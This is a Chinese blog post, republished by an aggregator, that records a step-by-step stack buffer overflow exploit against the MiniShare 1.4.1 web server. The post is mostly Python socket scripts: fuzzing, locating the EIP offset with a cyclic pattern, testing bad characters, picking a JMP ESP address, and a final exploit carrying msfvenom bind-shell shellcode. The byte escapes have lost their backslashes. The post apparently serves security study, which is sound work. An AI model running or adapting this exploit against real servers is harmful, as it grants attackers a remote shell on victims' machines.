缓冲区溢出初探之一
Posted whoami101
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了缓冲区溢出初探之一相关的知识,希望对你有一定的参考价值。
业余时间学习了buffer overflow ,简单记录一下操作过程。
文件下载地址:https://www.dropbox.com/s/zhivgb79wtbce37/minishare-1.4.1.exe?dl=0
1.模糊测试
目的:发送一定量的数据导致程序崩溃。
#!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*2000 buff+=" HTTP/1.1 " s.send(buff) s.close()
结果如图所示:看到eip被重写了。
2.确定eip的位置。
#!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*1787 buff+="BBBB" buff+="CCCCCCCCCCCCCCCCCCC" buff+=" HTTP/1.1 " s.send(buff) s.close()
#!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" buff+=" HTTP/1.1 " s.send(buff) s.close()
至此,我们已经看到eip已经被重写了。
3.寻找坏字符
先用一大批的字符去模糊测试,代码如下:
#!/usr/share/python import socket,sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) badchars = ("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f" "x20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5f" "x60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7f" "x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9f" "xa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbf" "xc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdf" "xe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff") buff="GET " buff+="A"*1787 buff += "BBBB" buff += badchars buff+=" HTTP/1.1 " s.send(buff) s.close()
结果如下:
0A,00,00,说明在x0d这里被截断,我们吧x0d去掉,然后在测试,全部通过,如图所示:
说明坏字符只有x0d和x00
4.寻找jmp esp
基本上当崩溃发生时我们希望ESP的内容由EIP执行。这意味着我必须让我的EIP跳转到ESP。这可以通过执行JMP ESP指令来实现。我们将打开服务器并在Immunity Debugger中查找包含JMP ESP指令的可执行模块,然后我们将在EIP上覆盖该指令的内存地址。
单击View - Executable modules您将看到可执行模块列表
或者利用mona模块--- !mona jmp -r esp 会在C:Program FilesImmunityIncImmunity Debuggerjmp.txt,如图所示:
我找了其中一个位置:0x77438265
5.生成shellcode
利用msf生成shellcode 加到exp中
#!/usr/share/python import socket,sys #msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "x00x0d" -f c #0x77438265 === x65x82x43x77 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((sys.argv[1],80)) buff="GET " buff+="A"*1787 buff+="x65x82x43x77" #address of jmp esp statement form user32.dll buff+="x90"*20 #20 NOPs are added buff += ("xb8x63x81xa1x61xdbxc8xd9x74x24xf4x5dx29xc9xb1" "x53x83xc5x04x31x45x0ex03x26x8fx43x94x54x67x01" "x57xa4x78x66xd1x41x49xa6x85x02xfax16xcdx46xf7" "xddx83x72x8cx90x0bx75x25x1ex6axb8xb6x33x4exdb" "x34x4ex83x3bx04x81xd6x3ax41xfcx1bx6ex1ax8ax8e" "x9ex2fxc6x12x15x63xc6x12xcax34xe9x33x5dx4exb0" "x93x5cx83xc8x9dx46xc0xf5x54xfdx32x81x66xd7x0a" "x6axc4x16xa3x99x14x5fx04x42x63xa9x76xffx74x6e" "x04xdbxf1x74xaexa8xa2x50x4ex7cx34x13x5cxc9x32" "x7bx41xccx97xf0x7dx45x16xd6xf7x1dx3dxf2x5cxc5" "x5cxa3x38xa8x61xb3xe2x15xc4xb8x0fx41x75xe3x47" "xa6xb4x1bx98xa0xcfx68xaax6fx64xe6x86xf8xa2xf1" "xe9xd2x13x6dx14xddx63xa4xd3x89x33xdexf2xb1xdf" "x1exfax67x75x16x5dxd8x68xdbx1dx88x2cx73xf6xc2" "xa2xacxe6xecx68xc5x8fx10x93xf8x13x9cx75x90xbb" "xc8x2ex0cx7ex2fxe7xabx81x05x5fx5bxc9x4fx58x64" "xcax45xcexf2x41x8axcaxe3x55x87x7ax74xc1x5dxeb" "x37x73x61x26xafx10xf0xadx2fx5exe9x79x78x37xdf" "x73xecxa5x46x2ax12x34x1ex15x96xe3xe3x98x17x61" "x5fxbfx07xbfx60xfbx73x6fx37x55x2dxc9xe1x17x87" "x83x5exfex4fx55xadxc1x09x5axf8xb7xf5xebx55x8e" "x0axc3x31x06x73x39xa2xe9xaexf9xd2xa3xf2xa8x7a" "x6ax67xe9xe6x8dx52x2ex1fx0ex56xcfxe4x0ex13xca" "xa1x88xc8xa6xbax7cxeex15xbax54") buff+=" HTTP/1.1 " s.send(buff) s.close()
6.漏洞利用
以上是关于缓冲区溢出初探之一的主要内容,如果未能解决你的问题,请参考以下文章